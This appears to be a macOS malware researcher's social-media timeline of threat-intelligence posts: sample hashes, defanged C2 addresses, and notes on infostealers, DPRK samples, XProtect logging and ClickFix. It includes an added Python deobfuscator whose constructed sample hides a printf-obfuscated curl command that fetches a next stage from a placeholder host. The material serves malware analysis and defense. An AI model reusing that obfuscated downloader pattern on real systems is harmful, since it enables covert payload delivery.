reverse engineer | arm64 :) | macOS/iOS | YouTube: youtube.com/@l0psec

Joined October 2017
Pinned Tweet
My new site for learning macOS malware reverse engineering: l0psec.github.io/Malware_RE_… I got my start in RE by using @patrickwardle's awesome blog. I would download samples and follow along. So I created this to complement that with dives into specific code from recent samples.
Jun 10
Quick one. Shared by @malwrhunterteam: 13e931b95b927b94b950cbc4f67ce17c96d350d81c04f07e523af613ada8397e - scpt file. 1 VT detection. Just uses base64 encoded string piped to bash to exec curl to download (from 172.94.9\.250) and exec next stage. 🧵
Jun 10
The IP 172.94.9\.250 has many detections (19). A bunch of files are related to this IP. These are the AppleScript infostealers we've seen many times already.
Jun 10
There is also another scpt which speaks to this IP that is currently not being detected: 5b06f36846c16006bf1987226b7321efe66759ea1cfdc8fc6612215d0fb6206e.
Been spending a lot of time with Unified Logs and discovered XProtect Behavioral Bastion events being handled by XProtectBridgeService. These all correspond to syspolicyd policy violations. Captures hash and path, very useful! Brief fun summary, more to come on this :) 🧵
This then calls submitEvent:withReply from the dylib libXProtectPayloads.dylib. Eventually get to the subroutine sub_420c70 which sets up a stack object for all the fields in behavioral events.
Some of the behavioral detections observed (there's more of these): macOS.DataExfil.Clipboard macOS.Browser.Generic macOS.Messages.Generic macOS.Network.Outgoing macOS.Execution.TempDir
L0Psec retweeted
.@Volexity has published details from an incident response engagement in September 2025 involving multiple #BRICKSTORM variants deployed by a threat actor that Volexity tracks as VerdantBamboo. This case involved the breach of the victim organization’s MSP and multiple malware implants found on firewalls, cloud storage sync devices & NAS appliances. VerdantBamboo used a #0day privilege escalation exploit in the process and was also observed using administrative access to the victim organization's firewall to enable a custom VPN. For more details on how the incident unfolded, the malware used by the threat actor, and the end goal of the intrusion, check out the full blog post: volexity.com/blog/2026/06/04… #dfir
L0Psec retweeted
New macOS Backdoor "FlutterShell" 🍎🐛 Discovered & analyzed by @PaloAltoNtwks @Unit42_Intel 🙌🏼 "weaponizes AI summarization features for data exfiltration by routing documents through an attacker-controlled server before processing them " 👀🔥 unit42.paloaltonetworks.com/…
May 29
Interesting script 8145a7920d69ee42e12533f5ef8d5e1168cd574db3586cb30af82f54c66d2f1d shared by @malwrhunterteam. This uses octal bytes passed to printf for the ASCII characters. For example: \143\165\162\154 = curl. Decoded the URLs in the script. 🧵 Quick summary
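The octal-in-printf trick described in the tweet above, worked through as an added example (this is not code from the tweet or from the sample it discusses): a small Python deobfuscator that decodes `\NNN` octal and `\xHH` hex escapes the way the shell's printf format string does, collapses `$(printf "...")` wrappers back to their literal text, and pulls URLs out of the result. The sample script fragment and its `example.invalid` domain are constructed placeholders, not indicators from the real script.

```python
import re

# Constructed sample for illustration only (not the script from the tweet). The command name
# and the URL are hidden behind octal escapes that printf turns back into ASCII at runtime.
SAMPLE_SCRIPT = r'''
u=$(printf "\150\164\164\160\072\057\057\145\170\141\155\160\154\145\056\151\156\166\141\154\151\144\057\163\145\164\165\160")
$(printf "\143\165\162\154") -fsSL "$u" -o /tmp/stage2
'''

# \NNN (1-3 octal digits), \xHH (1-2 hex digits), or an escaped backslash.
_ESCAPE = re.compile(r'\\(?:([0-7]{1,3})|x([0-9a-fA-F]{1,2})|(\\))')

# $(printf "...") or $(printf '...') with the format string captured.
_PRINTF_WRAP = re.compile(r"\$\(\s*printf\s+(?:\"([^\"]*)\"|'([^']*)')\s*\)")

_URL = re.compile(r"https?://[^\s\"'()<>]+")


def decode_printf_escapes(text: str) -> str:
    """Expand printf-style backslash escapes into the characters they encode."""
    def repl(m: re.Match) -> str:
        octal, hexa, backslash = m.groups()
        if octal is not None:
            return chr(int(octal, 8))
        if hexa is not None:
            return chr(int(hexa, 16))
        return "\\"
    return _ESCAPE.sub(repl, text)


def deobfuscate_script(script: str) -> str:
    """Replace $(printf "...") substitutions with their decoded literal text."""
    unwrapped = _PRINTF_WRAP.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), script)
    return decode_printf_escapes(unwrapped)


def extract_urls(text: str) -> list:
    """Return the URLs visible in (deobfuscated) script text, in order of appearance."""
    return _URL.findall(text)


if __name__ == "__main__":
    cleaned = deobfuscate_script(SAMPLE_SCRIPT)
    print(cleaned)
    print("URLs:", extract_urls(cleaned))
```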
May 29
There's more to this downloaded file, but looking for other matches that start with setup-5555 on VT, we can see a lot of hits with many AMOS and infostealer detections.
May 29
8145a7920d69ee42e12533f5ef8d5e1168cd574db3586cb30af82f54c66d2f1d - script boostamber7\.com blueprintmesh\.com 402eb798bba7b4cb44dc5aa098743b8d6395f9c57220737ce931639cc5cc1eff - setup-5555
L0Psec retweeted
Fake ChatGPT typosquat pushing Stealers cross-platform 👀 🍎 macOS → #Odyssey Stealer 🪟 Windows → #NOVABLIGHT / Sordeal MaaS 📱 mobile QRs are the only legit links 🤷‍♂️ 🧬 same Odyssey C int. 🔐 HH:MM seed in __cstring 🏗️ codesign tag ChatGpt- 👤 affiliate: "d***" 📡 C2 → 172[.]94.9.250 📡 bot handler → 192[.]253.248.181 💰 ReplaceApp → Ledger/Trezor apps
May 26
More DPRK (mach-O man) Alex Lopez signed samples shared by @malwrhunterteam: 0517ca4649e33faefa3a6bfcd2707a8376a981be4b42b9d19146ebb93e7f8a35 - winapp. 6 VT hits, very similar to last one covered but there's a couple updates I'll add here. 🧵
May 26
Interestingly, it checks if macOS version is > 24.6 with the macOSProductVersionGreaterThan_26_4() function. If greater, then the telegram function is called. Also the use of "best effort" in function deleteSelfExecutableBestEffort() is hilarious.
May 26
Both Alex Lopez (VLV25ZF66P) signed: 0517ca4649e33faefa3a6bfcd2707a8376a981be4b42b9d19146ebb93e7f8a35 - has telegram function. c02c1f13c76f598634d32de19166db6f3f89b14eabd884bdde52bdcf3cf3d163 - more detections, no telegram functionality.
L0Psec retweeted
⏳Only one month left to apply for "Objective for the We" (#OFTW) v4.0 #OFTW is a free 🍏-security event empowering the next generation: 📍 Berlin 🗓️ July 30–31, 2026 More info/to apply: objective-see.org/oftw/v4.ht…
L0Psec retweeted
ClickFix has quickly become one of the biggest social engineering threats facing Mac users. In the latest Security Bite Podcast by @9to5mac, @arinwaichulis sits down with @osint_barbie from Moonlock Lab and @L0Psec to unpack why ClickFix works so well, who it targets, and how Mac malware is evolving in 2026. Listen here: 9to5mac.com/2026/05/11/secur…